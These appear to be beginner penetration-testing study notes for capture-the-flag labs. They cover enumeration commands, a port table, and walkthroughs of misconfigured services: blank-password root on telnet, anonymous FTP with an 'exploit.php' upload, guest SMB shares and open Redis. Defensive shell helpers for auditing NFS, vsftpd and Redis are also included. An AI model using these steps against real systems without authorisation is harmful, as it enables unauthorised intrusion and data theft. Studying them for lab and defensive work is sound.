Basics

When first starting a penetration test or any security evaluation of a target, a primary step is enumeration, which involves scanning the target for open ports and identifying the services behind them.

Tools

ping - Packet Internet or InterNet Groper

ping <target-ip-addr> -c 4

nmap - Network Mapper

sudo nmap -p- <target-ip-addr> # Scan all 65535 TCP ports; takes longer.
sudo nmap -sV <target-ip-addr> # Name and version of the identified services.

showmount - mount info for NFS server

showmount -e <target-ip-addr>
/SomeDir (everyone)

sudo mkdir nfs
sudo mount -t nfs <target-ip-addr>:/SomeDir nfs # NFS source is written host:/export
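
Added example (not part of the original notes): a small shell helper that reads `showmount -e` output, flags exports open to everyone and prints the correct `host:/export` mount command. The export list is a constructed sample, not a real host.

```sh
# Added example: triage showmount -e output for world-readable NFS exports.
# SAMPLE_EXPORTS is constructed sample output, not captured from a real host.
SAMPLE_EXPORTS='Export list for 10.0.0.5:
/SomeDir   (everyone)
/backup    10.0.0.0/24
/home      (everyone)'

# Print one line per export as PATH<TAB>CLIENTS, skipping the header line.
parse_exports() {
    printf '%s\n' "$1" | awk 'NR > 1 && NF >= 2 { print $1 "\t" $2 }'
}

# Only the export paths whose client list is "(everyone)".
world_readable_exports() {
    parse_exports "$1" | awk -F'\t' '$2 == "(everyone)" { print $1 }'
}

# Number of exports open to everyone; a hardened server reports 0.
count_open_exports() {
    world_readable_exports "$1" | awk 'END { print NR }'
}

# Build the mount command with the host:/export syntax mount -t nfs expects.
nfs_mount_cmd() {
    printf 'sudo mount -t nfs %s:%s nfs\n' "$1" "$2"
}

# Demo run (export paths containing spaces would need a while-read loop).
for path in $(world_readable_exports "$SAMPLE_EXPORTS"); do
    echo "WARNING: $path is exported to everyone"
    nfs_mount_cmd 10.0.0.5 "$path"
done
```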

hash-id - Hash Identifier

hash-id -h <hash>
hash-id -f <file-name-path>

smbmap - SMB share drives

smbmap -H <target-ip-addr> -u 'user' -p 'pass'

enum4linux - Windows and Samba system

enum4linux <target-windows-ip-addr>

netdiscover - IP addresses on the network

netdiscover -r <network-addr>/<cidr>

netcat / whatweb / curl / dmitry - Banner Grabbing

netcat <target-ip-addr> <port>
220 (vsFTPd 2.3.4) # FTP
quit
221 Goodbye

whatweb http://<target-ip-addr>

dmitry -p <target-ip-addr> # -p: TCP port scan covering the 150 most used service ports.
dmitry -pb <target-ip-addr> # -b: also read the banner (program version) from each open port.

Port numbers

Number    Assignment
20        File Transfer Protocol (FTP) data transfer
21        File Transfer Protocol (FTP) command control
22        Secure Shell (SSH) secure login
23        Telnet remote login service, unencrypted text messages
25        Simple Mail Transfer Protocol (SMTP) email delivery
53        Domain Name System (DNS) service
67, 68    Dynamic Host Configuration Protocol (DHCP)
80        Hypertext Transfer Protocol (HTTP) used in the World Wide Web
110       Post Office Protocol (POP3)
119       Network News Transfer Protocol (NNTP)
123       Network Time Protocol (NTP)
143       Internet Message Access Protocol (IMAP) management of digital mail
161       Simple Network Management Protocol (SNMP)
194       Internet Relay Chat (IRC)
443       HTTP Secure (HTTPS) HTTP over TLS/SSL
546, 547  DHCPv6, IPv6 version of DHCP
6379      Redis

Challenges

telnet (port 23/tcp, Linux telnetd)

Telnet is an old service used for remote management of other hosts on the network. Usually, connection requests through telnet are configured with username/password combinations for increased security.

Note: Due to configuration mistakes, some important accounts can be left with blank passwords for the sake of accessibility. Typical important accounts have self-explanatory names, such as admin, administrator and root, which leaves them open to simple brute-forcing attacks.

$ telnet {target-ip-addr}

Meow login: root

cat flag.txt

FTP (port 21/tcp, vsftpd 3.0.3)

FTP is a file transfer service with a high chance of being poorly configured; it is easily misconfigured when not correctly understood. For secure transmission that protects the username and password and encrypts the content, FTP is often secured with SSL/TLS (FTPS) or replaced with the SSH File Transfer Protocol (SFTP).

Note: FTP users may authenticate themselves with a clear-text sign-in protocol, generally in the form of a username and password. A typical misconfiguration for running FTP services allows the anonymous username, followed by any password whatsoever since the service will disregard the password for this specific account.

$ ftp {target-ip-addr}
Name: anonymous
331 Please specify the password.
Password: anon123
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

226 Directory send OK.

ftp> get flag.txt # Download the file to the current local directory.
226 Transfer complete.

ftp> bye
421 Timeout
# Other options. Make sure the local working directory is the one where the file exists.
ftp> put exploit.php # Upload a file

ftp> mdelete exploit.php # Delete a file
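
Added example (not part of the original notes): a shell audit of a vsftpd.conf for the anonymous-login misconfiguration described above, printing the hardened value next to each weak setting. Both configuration texts are constructed samples; the keys used (anonymous_enable, anon_upload_enable, anon_mkdir_write_enable, ssl_enable) are real vsftpd options.

```sh
# Added example: audit vsftpd.conf settings behind anonymous FTP access.
# The two configs below are constructed samples, not taken from a real server.
SAMPLE_VSFTPD_CONF='listen=YES
anonymous_enable=YES
anon_upload_enable=YES
write_enable=YES
local_enable=YES
# ssl_enable=YES'

HARDENED_VSFTPD_CONF='anonymous_enable=NO
anon_upload_enable=NO
anon_mkdir_write_enable=NO
ssl_enable=YES'

# Effective (uncommented) value of a key; prints nothing when it is unset.
vsftpd_get() {
    printf '%s\n' "$1" | awk -F= -v key="$2" '
        $0 !~ /^[[:space:]]*#/ && $1 == key { v = $2 }
        END { print v }'
}

# Print one WEAK line per setting that differs from the recommended value.
# An unset key is reported too: rely on explicit settings, not defaults.
audit_vsftpd() {
    for rule in anonymous_enable=NO anon_upload_enable=NO \
                anon_mkdir_write_enable=NO ssl_enable=YES; do
        key=${rule%%=*}
        safe=${rule#*=}
        cur=$(vsftpd_get "$1" "$key")
        if [ "$cur" != "$safe" ]; then
            printf 'WEAK: %s=%s (recommended: %s)\n' "$key" "${cur:-<unset>}" "$rule"
        fi
    done
}

# Number of weak settings found; a hardened config yields 0.
weak_setting_count() {
    audit_vsftpd "$1" | awk 'END { print NR }'
}

audit_vsftpd "$SAMPLE_VSFTPD_CONF"
echo "weak settings in sample config:   $(weak_setting_count "$SAMPLE_VSFTPD_CONF")"
echo "weak settings in hardened config: $(weak_setting_count "$HARDENED_VSFTPD_CONF")"
```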

SMB (445/tcp, microsoft-ds?)

SMB (Server Message Block) is a communication protocol that provides shared access to files, printers and serial ports between endpoints on a network. SMB services are mostly seen running on Windows machines. SMB operates at the Application or Presentation layer of the OSI model and therefore relies on lower-level protocols for transport. The Transport layer protocol that the Microsoft SMB protocol is most often used with is NetBIOS over TCP/IP (NBT).

Note: An SMB-enabled storage location on the network is called a share. SMB clients are required to provide a username/password combination to see or interact with the contents of a share. A network administrator can sometimes make mistakes and accidentally allow logins without any valid credentials, or via guest accounts or anonymous log-ons.

Four separate shares:

  • ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.
  • C$ - Administrative share for the C:\ disk volume. This is where the operating system is hosted.
  • IPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.
  • WorkShares - Custom share.

$ smbclient -L {target-ip-addr}

$ smbclient \\\\{target-ip-addr}\\ADMIN$
    or
$ smbclient \\\\{target-ip-addr}\\C$
NT_STATUS_ACCESS_DENIED

# A custom share is human-made and therefore prone to misconfiguration.
$ smbclient \\\\{target-ip-addr}\\WorkShares
smb: \>
ls : listing contents of the directories within the share
cd : changing current directories within the share
get : downloading the contents of the directories within the share
exit : exiting the smb shell
# Passing username and password.
$ smbclient -U 'user' \\\\{target-ip-addr}\\Administrator

Redis (6379/tcp, key-value store 5.0.7)

Redis (REmote DIctionary Server) is an 'in-memory' database: one that relies essentially on primary memory for data storage (meaning the database is managed in the RAM of the system), in contrast to databases that store data on disks or SSDs. Because primary memory is significantly faster than secondary memory, the data retrieval time of an in-memory database is very small, giving very efficient and minimal response times.

Note: In-memory databases like Redis are typically used to cache frequently requested data for quick retrieval. The Keyspace section of the INFO output provides statistics on the main dictionary of each logical database: the number of keys and the number of keys with an expiration.

$ redis-cli -h {target-ip-addr}
> info
# Keyspace
db0:keys=4

> select 0 # Select Redis logical database followed by index number.

> keys * # List all the keys present.

> get flag

# If the server is password-protected, authenticate first:
$ redis-cli -h {target-ip-addr}
> AUTH <passkey>
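
Added example (not part of the original notes): shell functions that parse the "# Keyspace" section of `redis-cli info` output into per-database key and expiry counts, as the note above describes. The INFO text is a constructed sample, not a reply from a live server.

```sh
# Added example: parse the Keyspace section of `redis-cli info`.
# SAMPLE_REDIS_INFO is a constructed sample, not output from a real server.
SAMPLE_REDIS_INFO='# Server
redis_version:5.0.7

# Keyspace
db0:keys=4,expires=1,avg_ttl=3600000
db2:keys=10,expires=0,avg_ttl=0
'

# Only the dbN lines of the Keyspace section. INFO sections start with a
# "# Name" header; raw replies use CRLF line endings, so strip any \r first.
keyspace_lines() {
    printf '%s\n' "$1" | tr -d '\r' | awk '
        /^# / { ks = ($0 == "# Keyspace"); next }
        ks && /^db[0-9]+:/ { print }'
}

# One field (keys, expires or avg_ttl) of one db, e.g. "db0" "keys".
keyspace_field() {
    keyspace_lines "$1" | awk -F'[:,=]' -v db="$2" -v field="$3" '
        $1 == db { for (i = 2; i < NF; i += 2) if ($i == field) print $(i + 1) }'
}

# Sum of keys across all logical databases.
total_keys() {
    keyspace_lines "$1" | awk -F'[:,=]' '
        { for (i = 2; i < NF; i += 2) if ($i == "keys") n += $(i + 1) }
        END { print n + 0 }'
}

# Demo run: one summary line per database, then the total.
keyspace_lines "$SAMPLE_REDIS_INFO" | while IFS= read -r line; do
    db=${line%%:*}
    printf '%s: %s keys, %s with an expiry\n' "$db" \
        "$(keyspace_field "$SAMPLE_REDIS_INFO" "$db" keys)" \
        "$(keyspace_field "$SAMPLE_REDIS_INFO" "$db" expires)"
done
echo "total keys: $(total_keys "$SAMPLE_REDIS_INFO")"
```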
